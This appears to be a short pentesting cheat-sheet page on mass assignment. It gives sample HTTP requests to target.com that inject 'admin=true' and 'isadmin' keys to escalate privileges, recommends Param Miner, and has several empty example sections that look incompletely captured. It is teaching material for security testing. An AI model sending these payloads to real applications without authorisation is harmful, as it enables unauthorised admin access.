Web Mass Assignment
One of the ways that you can discover mass assignment vulnerabilities by finding interesting parameters in API documentation and then adding those parameters to requests. Look for parameters involved in user account properties, critical functions, and administrative actions.
If you do not have admin docus, then you can do a simple test by including other key-values to the JSON POST body, such as:
"isadmin": true,
"isadmin":"true",
"admin": 1,
"admin": true,
Normal request
POST /editdata HTTP/1.1
Host: target.com
...
username=daffaThe response
HTTP/1.1 200 OK
...
{"status":"success","username":"daffainfo","isAdmin":"false"}Modified Request
POST /editdata HTTP/1.1
Host: target.com
...
username=daffa&admin=trueExample 2
Example - PATCH Request
In addition, send a PATCH request with an invalid isAdmin parameter value:
If the application behaves differently, this may suggest that the invalid value impacts the query logic, but the valid value doesn't.
Example - nested object
Other example - Fuzzcompany name or ID
Guess Parameters
Burp - Param Miner



Ruby on Rails
Ruby on Rails is a web application framework that is vulnerable to this type of attack.

Source code:
username=new&password=test&confirmed=test

Resources
Interesting Books
Interesting BooksThe Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
Last updated